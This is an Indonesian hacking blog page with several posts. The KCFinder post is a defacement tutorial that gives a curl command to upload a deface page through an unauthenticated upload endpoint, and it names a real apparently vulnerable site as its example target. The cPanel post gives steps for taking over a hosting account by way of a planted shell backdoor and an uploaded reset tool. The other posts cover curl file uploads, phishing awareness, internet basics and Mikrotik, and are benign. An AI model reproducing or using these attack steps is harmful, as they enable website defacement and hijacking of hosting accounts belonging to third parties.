Showing posts with label New. Show all posts
Showing posts with label New. Show all posts

Tuesday, 18 December 2018

KCFinder Upload Script Deface di Terminal dengan cURL

Naufal Ardhani - Hallo gaesss udah jarang jarang nih gua nulis di blog ini dan sekarang lagi pengen banget ngepost artikel di blog tapi masalahnya gua bingung mau nulis apa, dan tiba tiba aja kepikiran nulis Tutorial Deface POC KCFinder di Terminal dengan cURL.



  • Apa itu Kcfinder?
     KCFinder adalah salah satu plugin populer untuk web file management yang biasa diintegrasikan dengan editor tinymce, ckeditor dan masih banyak lagi yang biasa digunakan oleh para web master. Celah keamanan ini bahkan sampai di versi yang paling baru. Cek di http://kcfinder.sunhater.com untuk lihat. Sebenarnya ini bukanlah hal yang baru, tapi sebagian admin yang jarang update info banyak juga yang kena batunya. Saya sendiri masih mendapati beberapa instansi pemerintah, lembaga pendidikan, perusahaan dalam negeri yang berpotensi diserang dengan bug ini.


  • Apa itu cURL?
    cURL adalah proyek perangkat lunak komputer yang menyediakan pustaka dan alat baris perintah untuk mentransfer data menggunakan berbagai protokol.


Silahkan baca juga jika ingin lebih tau Upload File dengan cURL di Terminal.

Oke langsung aja ke Tutorialnya,,,, sebelum ke mengikuti Step siapkan dulu bahan yang diperlukan,

Bahan :
  • Script Deface ( Simpan di Directory Desktop ) ( Simpan dengan nama index.shtml )
  • Terminal / CMD 
Tested :
  • MAC OS X Yosemite
Step :
  1. Buka Terminalnya, ketik "cd Desktop" tanpa tanda petik.
  2. lalu ketik "curl -F 'Filedata=@index.shtml' https://site.com/[path]/kcfinder/upload.php / link", Tapi disini target saya sudah ada seperti berikut "curl -F "Filedata=@index.shtml" http://seribuguru.org/assets/kcfinder/upload.php"
  3. Berhasil atau tidak? silahkan cek webnya dengan tambahkan /files/ setelah /kcfinder/upload/, Contoh : http://seribuguru.org/assets/kcfinder/upload/files/index.shtml.



Sekian saja tutorial kali ini semoga sedikit bermanfaat ilmunya untuk menjadi Security Hunter :v

Saturday, 15 December 2018

Upload File dengan CURL di Terminal

Naufal Ardhani - CURL adalah alat yang hebat untuk membuat permintaan ke server bagi kalian yang males untuk menggunakan CSRF ( Cross-site request forgery ), Saya rasa ini sangat bagus untuk digunakan untuk menguji API.


Untuk mengunggah file dengan CURL, banyak orang membuat kesalahan yang berpikir untuk menggunakan -X POST sebagai data formulir biasa; dalam fakta, dengan cara itu akan menyebabkan kesalahan.

Lalu bagaimana cara yang tepat? Cara yang tepat untuk mengupload/mengunggah file dengan CURL adalah menggunakan opsi -F (- form), yang akan menambahkan enctype = "multipart / form-data" ke permintaan.



  • naufal.txt hanya sebagai contoh file yang anda ingin upload.


$ curl -F ‘data=@path/to/local/file' UPLOAD_ADDRESS


Sebagai Contoh, jika saya ingin mengunggah file di /Users/naufalardhani/Desktop/naufal.txt ke server http://localhost/ upload yang memproses input file dengan parameter bentuk bernama img_avatar, saya akan membuat permintaan seperti ini,
$ curl -F 'img_avatar=@/home/naufalardhani/Desktop/naufal.txt' http://localhost/upload.php


Upload banyak file Untuk mengirim permintaan unggah untuk banyak file, cukup tambahkan opsi -F tambahan,
$ curl -F 'fileX=@/home/naufalardhani/Desktop/naufal.txt' -F 'fileY=@ /home/naufalardhani/Desktop/naufal.txt' ... http://localhost /upload.php


Unggah susunan file Untuk mengirim permintaan unggah array file, cukup tambahkan opsi -F tambahan dengan nama parameter bentuk yang sama dengan array,
$ curl -F 'file[]=@/home/naufalardhani/Desktop/naufal.txt' -F 'file []=@/path/ke/fileY' ... http://localhost/upload.php

Terima Kasih sudah menyempatkan waktu untuk membaca artikel saya, bila ada yang tidak dipahami silahkan komentar dibawah ya dengan disqus mudah kok caranya :)

Saturday, 20 October 2018

Tutorial Reset Password Cpanel Dengan Tools dan Shell Backdoor


Naufal Ardhani - Hello gaes di pagi hari ini gua bakal bagiin Tutorial yang paling dicari para defacer,,,, Tutorial apa? baca judul lah :V yaitu Tutorial Reset Password Cpanel, Tutorial Reset Password Cpanel sangat lah mudah cara kerjanya tetapi tidak semua website bisa di Reset Password Cpanelnya tergantung dari websitenya.




Gambar di bawah merupakan Web yang Cpanelnya bisa direset,


Yang dibutuhkan :
  • Tools [ KLIK INI ]
  • Akses Shell Backdoor di Website
  • Web yang bisa di reset pass cpanelnya seperti digambar atas.


Langsung aja stepnya,


  1. Akses Shell Backdoor anda dan cek usernya [ user web yang saya pakai ada building ], disini saya menggunakan Noname Shell Backdoor
  2. User web sudah ketemu, lalu upload script tools Reset Password Cpanelnya ke public_html / nama domain [ kalau saya diupload di public_html dengan nama file cp.php
  3. Sudah ter-Uploaded toolsnya, lalu akses toolsnya : www.site.com/cp.php
  4. Masukan email lo disitu dan klik tombol send.
  5. Akan otomatis muncul url dan copy url itu lalu buka untuk melakukan reset
  6. Jika sudah masuk ke halaman reset cpanel masukan username web yang tadi udah dicari dan klik tombol Reset Password.
  7. Masukan Akun Email Aktif anda dan Klik tombol Send Security Code
  8. Cek Email yang anda masukan untuk mengambil Security Code cpanelnya, jika sudah ada  langsung masukan dan Klik tombol Submit.
  9. You have successfully ver....... itu tandanya Security Code anda benar lalu masukan New Password dan Confirm Password dan klik tombol Set Password
  10. Berhasilll!!!!
  11. Langsung saja Login ke cpanel dengan password tadi.
Dan sudah ada di Dashboard Cpanel :))


Sekian Tutorial Reset Password Cpanel cek cek lagi artikel lainya.

Saturday, 13 October 2018

Bahaya Phising / Scam Page Account Banking

Naufal Ardhani - Kali ini saya akan membahas tentang Bahaya Phising / Scam Page Account Banking dan pelaku/pisher menggunakan nama perusahaan Cimb Niaga.

Banking


Apa itu Phising?
Phising adalah suatu metode yang di gunakan hacker untuk mencuri password dengan cara mengelabui target menggunakan fake form login pada situs palsu yang menyerupai situs aslinya bisa dibilang phising ( scampage).


pada beberapa kasus, situs palsu tersebut tidak terlalu mirip namun karena target kurang berhati hati dan tidak punya pengalaman tentang metode phishing maka bisa saja terjebak, jadi kalian harus berhati hati jika ada form login yang mengarahkan untuk memasukan akun sosmed atau yang penting penting, biasanya yang di incar adalah : credit cart, bank login, paypal account dll.



Proof Of Concept
1. Phisher/pelaku akan mengirim email mengatas nama kan cs dari bank tersebut untuk mengaktifkan kembali akun yang bermasalah.
darimana pelaku itu mendapatkan email saya? dan apakah hanya saya yang dikirimkan email oleh pelaku?  jawabannya adalah Dia mendapatkan email saya dari berbagai sumber informasi bisa saja ia hasil ngedump dari website yang pernah saya menyimpan email atau dari berbagai sumber dan pastinya ia juga tidak hanya menyebar pesan ini ke saya tapi juga ke orang yang banyak karna pasti akan susah mendapatkannya jika ia cuma menyebar ke satu email.



2. Kita akan diredirect ke menu login nya (fake login)

Dan setelah kita login sukses ternyata

4. Akun anda sudah diproses kembali atau akun anda akan dicatat dilog, untuk disimpan bersama korban yang lain. Percayalah account anda telah di intip oleh pencuri dan suatu saat  akan raib isinya!


Jika anda juga seperti ini berhati hatilah karna bisa saja anda menjadi target para carder yang mungkin ilmunya tinggi.

Sekian artikel Bahaya Phising / Scam Page Account Banking, bila ada salah pengetikkan saya mohon maaf karena saya juga masih belajar dalam hal ini.


Thanks to : http://www.binushacker.net

Tuesday, 9 October 2018

Struktur Dasar Internet

Naufal Ardhani - Internet merupakan jaringan besar komputer yang menghubungkan jutaan computer di seluruh dunia.Internet memberikan akses informasi yang dimasukkan oleh orang per orang, perusahaan, dan organisasi. Internet juga dapat digunakana untuk bertukar informasi, mengirim pesan, dan membeli barang.




DASAR-DASAR INTERNET
Sebagian besar orang terhubung (log masuk) dengan Internet menggunakan perangkat lunak disebut penjelajah web (browser)
Struktur dasar internet disediakan oleh perusahaan telepon. Kabel dari perusahaan telepon membawa informasi yang kamu kirimkan dan diterima ketika menggunakan internet. Sebagian besar pengguna dirumah menggunakan penyedia jasa internet (internet service provider-ISP), untuk menyediakan akses ke Internet. Ketika terhubung dengan internet, pesan-pesan dari komputermu akan masuk ke kabel telepon menuju komputer-komputer kuat milik ISP. Komputer-komputer tersebut bekerja seperti kantor pos elektronik, yang secara otomatis memilah dan mengirim informasi dalam hitungan detik.

Menggunakan Internet:
1. Anda log masuk ke internet melalui kabel telepon.
2. Pesan yang kamu ketik di penjelajah web akan masuk ke ISP.
3. ISP kemudian akan mengirimkan pesan melalui sederetan computer kuat yang disebut perute atau penghala (routers).
4. Informasi diteruskan sampai mencapai computer yang memegang informasi atau disebut server.
5. Server akan mengirimkan informasi yang kamu minta kembali ke ISP melalui perute.
6. ISP akan mengirimkan informasi kembali ke komputermu melalui kabel telepon.

World Wide Web (WWW) merupakan jaringan laman web raksasa yang dapat diakses melalui internet.

WORLD WIDE WEB (WWW)
(dalam bahasa Indonesia, waring wera wanua) merupakan sumber informasi raksasa, arena jejaring social, dan tempat melaksanakan perdagangan elektronik. Jaringan tersebut berisi jutaan laman web. Setiap laman terbentuk dari dokumen-dokumen yang disebut laman web.

HTML
Dalam bahasa computer, laman web ditulis HyperText Markup Language (HTML). Jika kamu sedang melihat sebuah halaman web, kamu dapat melihat kode-kode tersebut dengan mengklik tombol “View” (lihat), kemudian dilanjutkan dengan memilih “Source”.

TAUTAN
Pada laman web, beberapa kata atau gambar ditampilkan lebih menonjol. Jika kita mengkik kata-kata tersebut, maka akan muncul halaman baru dengan informasi yang baru, atau diunduh. Tautan dapat membuat kita berpindah dengan cepat dari satu halaman ke halaman lain di seluruh laman web.

NAMA-NAMA INTERNET
Setiap potongan informasi internet memiliki alamat, yang disebut dengan Pelokasi Sumber Daya Seragam (Uniform Resource Locator URL). Sebuah URL dapat memanggil informasi yang sesuai dengan keinginanmu. Alamat tersebut juga mendefinisikan format (disebut protocol) dari pesan yang akan dikirim.

Sebaris URL
http://www.howstuffworks.com/web-server/htm
http:// adalah protocol, singkatan dari hypertext transfer protocol (protocol transfer hiperteks).
www.howstuffworks.com adalah domain (ranah) yang merupakan identitas dari laman web dan server tempat laman tersebut disimpan.
Web-server.htm: path file, yang merupakan nama dari berkas yang disimpan. .htm menunjukkan bahwa berkas tersebut ditulis dalam kode HTML.

DOT COM
Bagian terakhir dari sebuah nama domain disebut sebagai domain tingkat atas. Berikut ini beberapa contoh arti dari nama tersebut.
.com untuk organisasi komersil
.edu untuk sekolah atau lembaga pendidikan
.gov untuk lembaga pemerintahan
.org untuk organisasi nirlaba (seperti organisasi amal)
Beberapa nama domain memiliki dua huruf tambahan sebagai identitas Negara tempatnya berasal. Sebagai contoh:
.es untuk Negara spanyol
.th untuk Negara Thailand
.uk untuk Inggris Raya

SURAT ELEKTRONIK (EMAIL)
Surel atau surat elektronik (electronic mail,Email) merupakan salah satu cara komputermu mengirimkan pesan kepada pengguna internet lainnya. Kamu menulis dan membaca Email dengan menggunakan perangkat lunak pembaca surat elektronik, seperti Outlook Express. Yang dibuat oleh Microsoft. Surat elektronik dikirimkan dari kabel telepon ke ISP. Dari sana, surat elektronik kemudian dikirimkan ke ISP penerima melalui internet, ketika menunggu waktu pengiriman, yaitu saat penerima melakukan log masuk ke Internet.

PERDAGANGAN ELEKTRONIK
Internet juga dapat digunakan untuk membeli dan menjual barang. Hal tersebut dikenal dengan perdagangan elektronik (e-commerce). Barang dan jasa yang ditawarkan pada laman web dapat dipesan secara langsung dengan mengisi formulir pemesanan yang terdapat pada laman web. Perdagangan elektronik juga membuat orang dapat membeli apa pun, kapan pun, dan dari mana pun. Tetapi, hal tesebut bukan berarti kamu tidak dapat mengamati barang-barang atau mencobanya sebelum kamu membelinya.

MOBILE INTERNET
Internet juga dapat diakses oleh telepon seluler. Telepon dapat menampilkan laman web dengan protocol yang berbeda dengan gambar yang lebih sedikit. Laman-laman tesebut didesain lebih sederhana dibandingkan laman web biasa karena jaringan telepon selular membawa lebih sedikit informasi digital dibandingkan koneksi internet biasa. Sebagian besar telepon seluler juga dapat digunakan untuk mengirim surat elektronik.


Sekian Artikel Struktur Dasar Internet semoga bermanfaat :)

Friday, 21 September 2018

Apa itu Mikrotik? dan Fungsinya?

Apa itu Mikrotik? dan Fungsinya? - Mikrotik adalah sistem operasi dan perangkat lunak yang dapat digunakan untuk menjadikan komputer manjadi router network yang handal, mencakup berbagai fitur yang dibuat untuk IP network dan jaringan wireless, cocok digunakan oleh ISP, provider hotspot dan warnet.

Gambaran Mikrotik


Mikrotik didesain untuk mudah digunakan dan sangat baik digunakan untuk keperluan administrasi jaringan komputer seperti merancang dan membangun sebuah sistem jaringan komputer skala kecil hingga yang kompleks sekalipun.

Belakangan ini banyak usaha warnet yang menggunakan mikrotik sebagai routernya, dan hasilnya mereka merasa puas dengan apa yang diberikan mikrotik. Terlebih kemajuan dunia wireless yang menyajikan berbagai macam pelayanan mulai melirik benda yang satu ini. Berbagai fitur ditawarkan pada mikrotik diantaranya :

  • Firewall dan NAT
  • Routing – Static routing
  • Data Rate Management
  • Hotspot
  • Point-to-Point tunneling protocols
  • Simple tunnels
  • IPsec
  • Web proxy
  • Caching DNS client
  • DHCP
  • Universal Client
  • VRRP
  • UPnP
  • NTP
  • Monitoring/Accounting
  • SNMP
  • MNDP
  • Tools


Fungsi Mikrotik


  1. Pengaturan koneksi internet dapat dilakukan secara terpusat dan memudahkan untuk pengelolaannya.
  2. Konfigurasi LAN dapat dilakukan dengan hanya mengandalkan PC Mikrotik Router OS dengan hardware requirements yang sangat rendah.
  3. Blocking situs-situs terlarang dengan menggunakan proxy di mikrotik.
  4. Pembuatan PPPoE Server.
  5. Billing Hotspot.
  6. Memisahkan bandwith traffic internasional dan local, dan lainnya.